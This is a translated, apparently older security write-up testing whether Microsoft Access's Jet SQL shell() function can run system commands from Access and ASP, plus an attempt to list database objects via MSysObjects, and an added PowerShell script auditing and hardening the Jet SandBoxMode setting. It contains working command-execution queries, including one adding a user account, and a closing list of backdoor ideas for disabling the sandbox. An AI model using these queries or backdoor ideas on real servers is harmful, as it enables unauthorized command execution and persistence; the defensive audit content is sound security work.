1. Shell testing
First, we run the SQL directly as a query in Access:
Statement: SELECT shell("c:\winnt\system32\0000.exe /c dir c:\ > c:\123456.txt");
"Run" it, then check the result from a command prompt:
C:\>dir 123456.txt
The volume in drive C is not labeled.
The serial number of the volume is 3CEE-A8A9.
Directory of C:\
      1,718 123456.txt
      1 file, 1,718 bytes
      0 directories, 1,224,527,872 available bytes
C:\>type 123456.txt
The volume in drive C is not labeled.
The serial number of the volume is 3CEE-A8A9.
Directory of C:\
         44 1.txt
         49 11.txt
          0 123456.txt
        478 333.txt
...
It executed successfully. Now let's look at what privileges the command runs with.
Change the statement to:
SELECT shell("c:\winnt\system32\2.16.exe /c net user aa /add");
After running it:
C:\>net user
User accounts for \\KAK-E8UHOQQ9M6S
----------------------------------------------
Aa                    Administrator
IUSR_KAK-E8UHOQQ9M6S  IWAM_KAK-E8UHOQQ9M6S
The command completed successfully.
The privileges appear to be fairly high (though they are probably inherited from the user running Access; I ran this as Administrator and did not test with a guest account).
Next, test it from ASP. First write an ASP file yourself; the code is as follows:
<%
Set Conn = Server.CreateObject("ADODB.Connection")
Dsn = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("q.mdb")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open Dsn
' The shell() argument is a Jet string literal, so its quotes are doubled inside the VBScript string
SQL = "select shell(""c:\winnt\system32\0000.exe /c dir c:\ > d:\sss1.txt"")"
Rs.Open SQL, Conn
If Rs.EOF And Rs.BOF Then
    Response.Write "Access Denied"
Else
    Response.Write "Access Allowed"
End If
Rs.Close
Set Rs = Nothing
' Close the connection
Conn.Close
Set Conn = Nothing
Response.Write "SQL:" & SQL
%>
Requesting the ASP page returns:
Microsoft VBScript compiler error 800a03f6
End missing
/IisHelp/common/500-100.asp, row 242
Microsoft JET Database Engine error 80040e14
The shell function is not defined in the expression.
/Test/lse/Connections/kaoo6.asp, Row 7
The "shell function is not defined" error means the test failed.
Next, change the provider in the connection string from:
Dsn = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("q.mdb")
to:
Dsn = "Provider=Microsoft.Jet.OLEDB.3.5; Data Source=" & Server.MapPath("q.mdb")
Loading the page in IE returns:
Microsoft VBScript compiler error 800a03f6
End missing
/IisHelp/common/500-100.asp, row 242
ADODB. Connection error 800a0e7a
Provider cannot be found. It may not be properly installed.
/Test/lse/Connections/kaoo8.asp, Row 5
The 3.5 provider is not installed on this machine, so this test goes no further.
2. Testing database dumping ("brute-forcing" the database)
Here the MSysObjects system table is used. Create a new query in Access with the following statement:
SELECT MSysObjects.DateCreate, MSysObjects.DateUpdate, MSysObjects.Name, MSysObjects.Type FROM MSysObjects;
MSysObjects.DateCreate - creation time of the object
MSysObjects.DateUpdate - last update time
MSysObjects.Name - object (table/query) name
MSysObjects.Type - object type
Running this statement in Access returns the list of objects in the database.
Now put it in ASP:
<%
Set Conn = Server.CreateObject("ADODB.Connection")
Dsn = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("q.mdb")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open Dsn
SQL = "SELECT MSysObjects.DateCreate, MSysObjects.DateUpdate, MSysObjects.Name, MSysObjects.Type FROM MSysObjects;"
Rs.Open SQL, Conn
If Rs.EOF And Rs.BOF Then
    Response.Write "Access Denied"
Else
    Response.Write "Access Allowed"
End If
Rs.Close
Set Rs = Nothing
' Close the connection
Conn.Close
Set Conn = Nothing
Response.Write "SQL:" & SQL
%>
IE returns:
Microsoft VBScript compiler error 800a03f6
End missing
/IisHelp/common/500-100.asp, row 242
Microsoft JET Database Engine error 80040e09
Record(s) cannot be read; no read permission on 'MSysObjects'.
/Test/lse/Connections/kaoo7.asp, Row 7
The error says the records cannot be read: the web user has no read permission on MSysObjects. So this route does not work either.
3. Supplement
Under IIS 5 with Microsoft.Jet.OLEDB.4.0 we cannot execute shell() directly (reportedly it works in Jet 3.5, i.e. the IIS 4 era). Jet.OLEDB.4.0 disallows it by default, but the setting is configurable: it can be changed through the registry.
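The registry setting the supplement refers to is Jet's SandBoxMode value. As an added example (not part of the original article), this PowerShell script audits that value on a server and offers a hardening function; the key path and the meaning of each value are assumed from Microsoft's Jet 4.0 documentation, and the 32-bit engine's settings on 64-bit Windows are assumed to live under Wow6432Node.

```powershell
# Added example, not from the original article: audit the Jet 4.0 SandBoxMode
# value that decides whether Jet SQL may evaluate unsafe expressions such as
# shell(). Key path and value meanings are assumed from Microsoft's Jet 4.0
# documentation; the 32-bit engine on 64-bit Windows stores its settings
# under Wow6432Node, so both registry views are checked.
$paths = @(
    'HKLM:\SOFTWARE\Microsoft\Jet\4.0\Engines',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Jet\4.0\Engines'
)
$meaning = @{
    0 = 'sandbox off everywhere: shell() allowed from Access and from ADO/ASP'
    1 = 'sandbox only for Access: ADO/ASP callers may still run shell()'
    2 = 'sandbox for non-Access callers: ASP gets "shell function is not defined", Access itself may run it'
    3 = 'sandbox always on (recommended)'
}

function Get-JetSandboxMode {
    param([string]$Path)
    if (-not (Test-Path $Path)) { return $null }
    $item = Get-ItemProperty -Path $Path -Name SandBoxMode -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.SandBoxMode
}

function Set-JetSandboxMode {
    # Hardening: force the sandbox on for every caller (needs administrator rights).
    param([string]$Path)
    Set-ItemProperty -Path $Path -Name SandBoxMode -Value 3 -Type DWord
}

foreach ($p in $paths) {
    if (-not (Test-Path $p)) { continue }
    $mode = Get-JetSandboxMode -Path $p
    if ($null -eq $mode) {
        "$p : SandBoxMode not set, the engine's built-in default applies"
        continue
    }
    "$p : SandBoxMode = $mode ($($meaning[$mode]))"
    if ($mode -lt 3) {
        Write-Warning "Unsafe Jet expressions are reachable from some caller; run Set-JetSandboxMode -Path '$p' to enforce mode 3"
    }
}
```

Mode 2 is the behaviour the tests above observed: the query runs inside Access but the same SQL from ASP fails with "shell function is not defined", so a web server that hosts .mdb files should be audited for mode 3 and for any process that can open the database outside the sandbox.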
Backdoor ideas:
1. Change the registry setting above so that Jet.OLEDB.4.0 allows shell(), after which it can be used directly from ASP.
2. Use another program to operate on the .mdb file directly and run select shell() to execute system commands.